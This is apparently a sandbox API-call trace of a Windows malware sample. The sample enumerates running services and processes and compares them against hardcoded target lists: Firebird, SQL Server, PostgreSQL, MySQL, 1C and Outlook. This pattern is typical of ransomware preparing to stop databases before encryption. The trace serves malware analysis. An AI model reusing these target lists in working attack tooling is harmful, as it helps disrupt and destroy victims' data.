	[0053.288] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1
	[0053.289] lstrlenW (lpString="VSSVC.exe") returned 9
	[0053.289] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0053.289] lstrlenW (lpString="svchost.exe") returned 11
	[0053.289] Process32NextW (in: hSnapshot=0x178, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0053.290] CloseHandle (hObject=0x178) returned 1
	[0053.290] Sleep (dwMilliseconds=0x1f4) 
	[0054.734] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x7e0fe28
	[0054.734] EnumServicesStatusExW (in: hSCManager=0x7e0fe28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 0
	[0054.734] GetLastError () returned 0xea
	[0054.734] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x12c6) returned 0xbb20050
	[0054.734] EnumServicesStatusExW (in: hSCManager=0x7e0fe28, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xbb20050, cbBufSize=0x12c6, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xbb20050, pcbBytesNeeded=0x935ff44, lpServicesReturned=0x935ff5c, lpResumeHandle=0x0) returned 1
	[0054.735] CloseServiceHandle (hSCObject=0x7e0fe28) returned 1
	[0054.735] lstrlenW (lpString="Appinfo") returned 7
	[0054.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0054.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0054.735] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0054.735] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0054.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0054.735] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0054.735] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0054.735] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0054.735] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0054.735] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0054.735] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0054.736] lstrlenW (lpString="AudioSrv") returned 8
	[0054.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0054.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0054.736] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0054.736] lstrlenW (lpString="BFE") returned 3
	[0054.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0054.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0054.736] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0054.736] lstrlenW (lpString="CryptSvc") returned 8
	[0054.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0054.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0054.736] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0054.736] lstrlenW (lpString="CscService") returned 10
	[0054.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0054.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0054.736] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0054.736] lstrlenW (lpString="DcomLaunch") returned 10
	[0054.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0054.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0054.736] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0054.736] lstrlenW (lpString="Dhcp") returned 4
	[0054.736] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0054.736] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0054.736] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0054.736] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0054.737] lstrlenW (lpString="Dnscache") returned 8
	[0054.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0054.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0054.737] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0054.737] lstrlenW (lpString="DPS") returned 3
	[0054.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0054.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0054.737] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0054.737] lstrlenW (lpString="eventlog") returned 8
	[0054.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0054.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0054.737] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0054.737] lstrlenW (lpString="EventSystem") returned 11
	[0054.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0054.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0054.737] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0054.737] lstrlenW (lpString="gpsvc") returned 5
	[0054.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0054.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0054.737] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0054.737] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0054.737] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0054.737] lstrlenW (lpString="iphlpsvc") returned 8
	[0054.737] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0054.737] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0054.737] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0054.738] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0054.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0054.738] lstrlenW (lpString="LanmanServer") returned 12
	[0054.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0054.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0054.738] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0054.738] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0054.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0054.738] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0054.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0054.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0054.738] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0054.738] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0054.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0054.738] lstrlenW (lpString="lmhosts") returned 7
	[0054.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0054.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0054.738] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0054.738] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0054.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0054.738] lstrlenW (lpString="MMCSS") returned 5
	[0054.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0054.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0054.738] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0054.738] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0054.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0054.738] lstrlenW (lpString="MpsSvc") returned 6
	[0054.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0054.738] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0054.738] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0054.738] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0054.738] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0054.738] lstrlenW (lpString="Netman") returned 6
	[0054.738] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0054.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0054.739] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0054.739] lstrlenW (lpString="netprofm") returned 8
	[0054.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0054.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0054.739] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0054.739] lstrlenW (lpString="NlaSvc") returned 6
	[0054.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0054.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0054.739] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0054.739] lstrlenW (lpString="nsi") returned 3
	[0054.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0054.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0054.739] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0054.739] lstrlenW (lpString="PcaSvc") returned 6
	[0054.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0054.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0054.739] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0054.739] lstrlenW (lpString="PlugPlay") returned 8
	[0054.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0054.739] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0054.739] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0054.739] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0054.739] lstrlenW (lpString="Power") returned 5
	[0054.739] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0054.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0054.740] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0054.740] lstrlenW (lpString="ProfSvc") returned 7
	[0054.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0054.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0054.740] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0054.740] lstrlenW (lpString="RpcEptMapper") returned 12
	[0054.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0054.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0054.740] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0054.740] lstrlenW (lpString="RpcSs") returned 5
	[0054.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0054.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0054.740] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0054.740] lstrlenW (lpString="SamSs") returned 5
	[0054.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0054.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0054.740] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0054.740] lstrlenW (lpString="Schedule") returned 8
	[0054.740] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0054.740] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0054.740] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0054.740] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0054.740] lstrlenW (lpString="SENS") returned 4
	[0054.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0054.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0054.741] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0054.741] lstrlenW (lpString="ShellHWDetection") returned 16
	[0054.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0054.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0054.741] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0054.741] lstrlenW (lpString="Spooler") returned 7
	[0054.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0054.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0054.741] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0054.741] lstrlenW (lpString="swprv") returned 5
	[0054.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="swprv") returned -1
	[0054.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="swprv") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlwriter", lpString2="swprv") returned -1
	[0054.741] lstrcmpiW (lpString1="mssqlserver", lpString2="swprv") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="swprv") returned -1
	[0054.741] lstrlenW (lpString="SysMain") returned 7
	[0054.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0054.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0054.741] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0054.741] lstrlenW (lpString="Themes") returned 6
	[0054.741] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0054.741] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0054.741] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0054.741] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0054.742] lstrlenW (lpString="TrkWks") returned 6
	[0054.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0054.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0054.742] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0054.742] lstrlenW (lpString="UxSms") returned 5
	[0054.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0054.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0054.742] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0054.742] lstrlenW (lpString="VSS") returned 3
	[0054.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="VSS") returned -1
	[0054.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1
	[0054.742] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1
	[0054.742] lstrlenW (lpString="WdiServiceHost") returned 14
	[0054.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0054.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0054.742] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0054.742] lstrlenW (lpString="WdiSystemHost") returned 13
	[0054.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0054.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0054.742] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0054.742] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0054.742] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0054.742] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0054.742] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0054.743] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0054.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0054.743] lstrlenW (lpString="Winmgmt") returned 7
	[0054.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0054.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0054.743] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0054.743] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0054.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0054.743] lstrlenW (lpString="WPDBusEnum") returned 10
	[0054.743] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0054.743] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0054.743] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0054.743] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0054.743] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0054.743] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xbb20050 | out: hHeap=0x7d60000) returned 1
	[0054.743] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21c
	[0054.745] Process32FirstW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0054.746] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0054.746] lstrlenW (lpString="System") returned 6
	[0054.746] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0054.746] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0054.746] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0054.746] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0054.746] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0054.746] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0054.746] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0054.746] Process32NextW (in: hSnapshot=0x21c, lppe=0x935fd34 | out: lppe=0x935fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0054.747] lstrlenW (lpString="smss.exe") returned 8
	[0054.747] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0054.747] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0054.747] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0054.747] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0054.747] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0054.747] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0054.747] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
